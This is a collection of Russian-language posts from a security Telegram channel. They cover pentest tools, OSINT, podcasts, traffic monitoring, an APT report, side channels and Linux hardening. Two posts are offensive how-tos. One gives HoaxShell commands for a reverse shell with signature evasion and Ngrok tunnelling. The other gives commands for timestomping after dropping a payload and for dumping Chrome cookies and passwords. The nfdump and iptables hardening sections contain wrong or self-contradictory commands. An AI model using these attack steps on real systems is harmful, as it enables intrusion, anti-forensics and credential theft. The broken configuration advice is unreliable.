APTRS: автоматизация отчётов пентестера без боли

👋 Приветствую в мире цифровой безопасности!

Поговорим о еще одном инструменте безопасности.

⏺APTRS — автоматизация, которая реально экономит время. Тут вместо ручной сборки отчётов: просто ведёте проект, отмечаете найденные уязвимости, а остальное делает система. Генерация отчётов, дашборд для клиента, шаблоны под ваш стиль - всё уже встроено.

⏺Чем цепляет: по сути, это пентест-CRM с кнопкой “Собрать отчёт”. Загружаете PoC, описания, рекомендации, отмечаете, что пофикшено — и готово. Не нужно копировать текст между документами, править вручную или держать десятки таблиц. Установка — через docker-compose, в демку можно зайти прямо сейчас.

ZeroDay | #Инструмент

👋 Приветствую в мире цифровой безопасности!

Сделал для вас новую подборку крутых подкастов по ИБ и не только. В этот раз они будут англоязычные.

⏺ The 443 – Security Simplified — хакеры и исследователи обсуждают главные новости недели.
⏺ 7 Minute Security — коротко, но по делу. Каждую неделю тут советы, лайфхаки и практики для синих команд и безопасников.
⏺ CISO Series Podcast — инсайды от топов. Как думают директора по безопасности, чем они живут, как выстраивают процессы и балансируют между рисками и бюджетами.
⏺ The Social-Engineer Podcast — глубже про социнженерию: от манипуляций в переговорах до защиты от фишинга. Ведущий - автор книг и практик, которые применяют даже в спецслужбах.
⏺ The NDS Show — OSINT и разведка на основе открытых данных: геолокации, спутниковые снимки, публичные источники.
⏺ Cyber CEOs Decoded — CEO Devo зовёт в гости других директоров из мира ИБ. Истории, провалы, рост — всё, что за кулисами больших компаний.

ZeroDay | #Подборка

Мониторим трафик в Linux с nfdump

👋 Приветствую в мире цифровой безопасности!

Сегодня расскажу о легкой настройке мониторинга сетевых соединений в Linux с помощью nfdump и NetFlow

⏺Установка и сбор данных с nfdump: nfdump - удобный тул для сбора и анализа NetFlow/IPFIX данных. Сначала установим и запустим nfdump:

sudo apt install nfdump
sudo systemctl start nfacctd

Затем настроим nfacctd.conf для приёма NetFlow с вашего маршрутизатора или коммутатора. Например:

[collector1]
bind = 0.0.0.0
port = 2055

⏺Анализ и фильтрация потоков: а вот полученные данные можно смотреть через консоль:

nfdump -r /var/log/nfdump/currentfile

Для поиска трафика с подозрительных IP или портов:

nfdump -r /var/log/nfdump/currentfile "dst port 22 or src ip 192.168.1.5"

⏺Экспорт и интеграция с SIEM: nfdump умеет выгружать данные в CSV или JSON, которые уже потом легко можно отправить в вашу SIEM систему для анализа и корреляции:

nfdump -r /var/log/nfdump/currentfile -o csv > flows.csv

Или через cron запускать регулярный экспорт для автоматизации.

ZeroDay | #безопасность

Преступный ИИ уже существует, и он доступен любому

То, что раньше требовало опыта и кучи навыков, теперь умеет делать Xanthorox - это перый полноценный ИИ-преступник. Никаких даркнетов и сложных паролей - всё легко: YouTube, Telegram, Discord и интерфейс как у ChatGPT. Вводите запрос и получаете фишинг, дипфейки или вымогатель.

⏺В статье о том, как от джейлбрейков ChatGPT мы дошли до WormGPT и целой армии преступных ИИ. Расскажут, как школьники запускают тысячи атак, и почему самая большая угроза - это массовое мошенничество, а не ядерные бомбы.

Короче, ИБшникам напрячься 😬

ZeroDay | #Статья

HoaxShell: обратный шелл в маске веб-трафика

👋 Приветствую в мире цифровой безопасности!

Поговорим о еще одном инструменте безопасности.

⏺Что за инструмент: HoaxShell генерит PowerShell-пейлоады с подстроенными под реальные веб-запросы URL и хитрыми HTTP-заголовками, а шифрование и поддержка HTTPS делают их похожими на обычный браузерный трафик. Если связь прервётся - сессия легко восстановится

⏺Чем крут: не тупо обратный шелл - это такой виртуальный хамелеон в сети. Его сложно заметить и еще сложнее заблокировать, а настройка очень и очень легкая, а значит позволяет быстро адаптировать его под любую ситуацию.

⏺Как начать: Разворачиваете сервер, генерируете пейлоад с нужными параметрами и запускаете на целевой машине — и всё, связь установлена и маскирована под обычный веб-трафик.

ZeroDay | #Инструмент

Настроим PowerShell через HTTP с помощью Hoaxshell

👋 Приветствую в мире цифровой безопасности!

А теперь разберем, как работать с инструментом из прошлого поста

⏺Установка: Ставится легко — обычный git и pip:

git clone https://github.com/t3l3machus/hoaxshell  
cd ./hoaxshell  
sudo pip3 install -r requirements.txt  
chmod +x hoaxshell.py  

⏺Базовое подключение: Запускаем сервер на вашей машине:

sudo python3 hoaxshell.py -s <your_ip>

Сгенерируется PowerShell-пейлоад, готовый к запуску на машине.

⏺Хотите меньше палиться: Подставляем стандартный HTTP-заголовок, чтобы не ловиться на сигнатуры:

sudo python3 hoaxshell.py -s <your_ip> -i -H "Authorization"

Можно ещё подгрузить свой .ps1:

sudo python3 hoaxshell.py -s <your_ip> -x "C:\Users\\\$env:USERNAME\.local\hack.ps1"

А если потеряли сессию - восстанавливаем:

sudo python3 hoaxshell.py -s <your_ip> -g

⏺HTTPS и туннели: Есть поддержка HTTPS с самоподписанным или валидным сертификатом, а ещё - возможность прокинуть через Ngrok или LocalTunnel:

sudo python3 hoaxshell.py -ng  # через Ngrok  
sudo python3 hoaxshell.py -lt  # через LocalTunnel  

⏺И да кстати, интерактивные команды (типа powershell или cmd.exe) могут подвесить сессию. Всё, что нужно - запускать команды напрямую, не открывая консоль внутри консоли. Например:

cmd /c whoami
powershell echo 'Test'

ZeroDay | #Инструмент

Lotus Panda: взломы госструктур ЮВА

👋 Приветствую в мире цифровой безопасности!

Расскажу о APT-группировке Lotus-Panda.

⏺Группа Lotus Panda атаковала госструктуры и авиасектор в Юго-Восточной Азии с августа 2024 по февраль 2025. Под удар попали министерства, авиадиспетчеры, телеком и СМИ.

⏺Как атакуют: Хакеры юзают легальные .exe от Trend Micro и Bitdefender, чтобы загружать вредоносные DLL. Основной инструмент - обновлённый Sagerunex для сбора и кражи данных. Также в ход идут reverse SSH и утилиты ChromeKatz/CredentialKatz, вытаскивающие куки и пароли из Chrome.

⏺Маскировка и обход анализа: Для скрытности используют легальные тулзы: Zrok (удалённый доступ к внутренним сервисам) и datechanger.exe (подмена таймстемпов). Это мешает аналитикам отследить точку входа, которая, кстати, до сих пор не найдена.

⏺Что важно: Lotus Panda вообще не новички. С 2009 года они атакуют правительства, дипломатов и армию. Их стиль - это фишинг, эксплойты, легальный софт. Кампания показывает, что они продолжают развивать инструменты и расширяют зону охвата.

ZeroDay | #безопасность

3 лайфхака для пентестинга

👋 Приветствую в мире цифровой безопасности!

Расскажу о трех полезных фишках про пентесте.

⏺Zrok: легальный способ попасть во внутреннюю сеть: это инструмент от OpenZiti для шаринга локального сервиса через P2P-туннель. Используется даже легально в CI/CD, но в пентесте позволяет “протянуть” доступ к хосту без открытых портов.

zrok enable public --backed-by tcp --frontend-url tcp://:8080
# и получаем внешний endpoint

⏺datechanger.exe — запутываем аналитиков: Меняем таймстемпы файлов, чтобы затруднить расследование инцидента. Особенно полезно после дропа и запуска payload’а.

datechanger.exe -modify 01/01/2017 payload.exe

⏺ChromeKatz: воровство куков и паролей в одну команду: Развитие идеи Mimikatz, но для браузера. Извлекает логины, куки и токены прямо из Chrome-профиля.

ChromeKatz.exe -dump

ZeroDay | #пентест

Как мессенджеры шифруют сообщения (end-to-end) на самом деле

То, что кажется магией в WhatsApp или Signal, на самом деле просто: пара ключей, немного математики и алгоритм ECDH. Вы пишете «Привет», и никто, кроме собеседника, не может это прочитать, даже сервер мессенджера.

⏺В статье расскажут, как работает сквозное шифрование: от публичного и приватного ключа до симметричного shared secret, который нигде не хранится, но всегда создаётся заново. Показывают, как это устроено в браузере с Web Crypto API - прямо как у больших мессенджеров.

ZeroDay | #Статья

BlackBird: массовый OSINT-поиск на 600 сайтах

👋 Приветствую в мире цифровой безопасности!

Поговорим о еще одном инструменте безопасности.

⏺Что это: BlackBird — OSINT-инструмент, который прочёсывает ~600 сайтов в поисках заданного ника. Соцсети, платформы, маргинальные форумы - если человек где-то светился под этим именем, вы об этом узнаете.

⏺В чём крутость: Это не браузерный кликер. BlackBird работает асинхронно, сразу стреляя пачкой HTTP-запросов.
На каждый запуск тут новый user-agent (а в пуле их больше тысячи), чтобы не словить бан.
Все шаблоны проверок — в data.json.

ZeroDay | #Инструмент

🤯 Потерял 129 млн, но... отделался лёгким испугом! Как такое возможно?
Злоумышленники провели атаку «отравленными» адресами: отправили «пыль» (1.01 USDT) с кошелька, похожего на адрес контрагента жертвы.

Через минуту после пробной транзакции, пользователь получил «пыль» с фальшивого кошелька, копирующего оригинальный адрес в начале и в конце. Не проверив символы, он отправил $129 млн… прямо в руки мошенника.

🙂 Новость облетела интернет за сутки. Мошенник, возможно, испугался подобной огласки и вернул украденное обратно.

Будьте в курсе сомнительных схем. На канале КоинКит — экспертные разборы, расследования и рекомендации по защите активов.
А еще обезопась себя с промокодом GIFT10 на 10 проверок в КоинКит Лайт

Оставайтесь в безопасности с @coinkyt!

Боковые каналы: утечка данных без взлома

👋 Приветствую в мире цифровой безопасности!

Поговорим о не банальном векторе атаки - side-channel attacks.

⏺Что это вообще такое: Это способ получить инфу не из самой системы, а из побочных эффектов её работы. Шум, электромагнитное излучение, время выполнения - всё это может выдать секреты.

Посмотрим на примеры таких атак:

1️⃣Время отклика — сравнение задержек при обработке разных запросов помогает понять, какие данные лежат в памяти. Так работал [Timing Attack на TLS].
2️⃣Энергопотребление — анализ колебаний напряжения в смарткартах позволял узнать зашифрованные PIN-коды.
3️⃣Акустика — звук нажатий на клавиатуру позволяет восстановить вводимый текст с точностью до 90%.
4️⃣Cache timing — атаки вроде Spectre и Meltdown используют особенности архитектуры CPU, чтобы читать память между процессами.

⏺Чем опасно: Даже без доступа к системе можно получить приватную инфу. Часто такие атаки не логируются, а значит остаются незамеченными.

⏺Можно ли защититься: Полностью - сложно, но можно снизить риск: делают алгоритмы с одинаковым временем выполнения, рандомизируют работу (например, вставляя шум или задержки), ограничивают физический доступ и учитывают такие атаки на этапе threat modeling.

ZeroDay | #sidechannel

Защищаем Linux-сервер от lateral movement

👋 Приветствую в мире цифровой безопасности!

Сегодня расскажу, как закрыть сервер от “горизонтального перемещения” злоумышленника внутри сети.

⏺Блокируем лишний исходящий трафик: По умолчанию сервер может соединяться с любым адресом. Исправим:

# Оставим только DNS и APT
iptables -P OUTPUT DROP
iptables -A OUTPUT -p udp --dport 53 -j ACCEPT
iptables -A OUTPUT -p tcp --dport 443 -d deb.debian.org -j ACCEPT

⏺Отключаем LLMNR и mDNS: Протоколы локального разрешения имён - подарок для атакующего. На проде не нужны:

echo "LLMNR=no" >> /etc/systemd/resolved.conf
systemctl restart systemd-resolved

# mDNS
systemctl stop avahi-daemon
systemctl disable avahi-daemon

⏺Ограничиваем доступ к сокетам ядра: /proc и /sys — часто недооценённая угроза. Убираем излишнюю информацию:

mount -o remount,hidepid=2 /proc
chmod 700 /boot

⏺Контролируем вход по SSH по UID: Создаём отдельного пользователя, которому разрешён доступ наружу, а всем остальным — нет:

iptables -A OUTPUT -m owner --uid-owner safeuser -j ACCEPT
iptables -A OUTPUT -j DROP

ZeroDay | #безопасность

Скрытые языки: как инженеры общаются без документации

👋 Приветствую в мире цифровой безопасности!

Сегодня расскажу, как в инженерных командах формируется негласный язык. Он нигде не зафиксирован, но по нему живёт и работает весь стек.

⏺Почему это работает: Письменная документация устаревает, а внутренняя культура — нет. Она передаётся через pull-запросы, архитектурные шаблоны, и особенно через «мы всегда делали так».

⏺Примеры скрытого языка на практике:

1️⃣“Сначала Redis” — правило без описания
Redis — это система для быстрого хранения данных. У команды нет документа, что её нужно использовать первой, но в коде видно: если данных нет в Redis, мы идём в базу данных и потом кладём обратно в Redis. Это — негласный стандарт.

# Python
@router.get("/profile/{id}")
def get_profile(id: int):
    cached = redis.get(id)
    if cached:
        return cached
    profile = db.fetch(id)
    redis.set(id, profile)
    return profile

2️⃣“Вся логика в switch": Вместо блок-схем и документации по архитектуре — конструкция switch, которая распределяет обработку по типам данных

// Go
switch msg.Type {
case MsgCreate:
    return s.handleCreate(msg)
case MsgDelete:
    return s.handleDelete(msg)
default:
    logger.Warn("unknown message", zap.String("type", msg.Type))
}

3️⃣deploy.sh как глас команды: CI/CD описан в устной традиции. Актуальный сценарий — это старый deploy.sh, где закодированы соглашения и порядок действий:

# Bash
docker build -t api .
docker push api
kubectl rollout restart deployment/api

Новички по нему ориентируются. Он неточен, но всё ещё указывает направление.

ZeroDay | #безопасность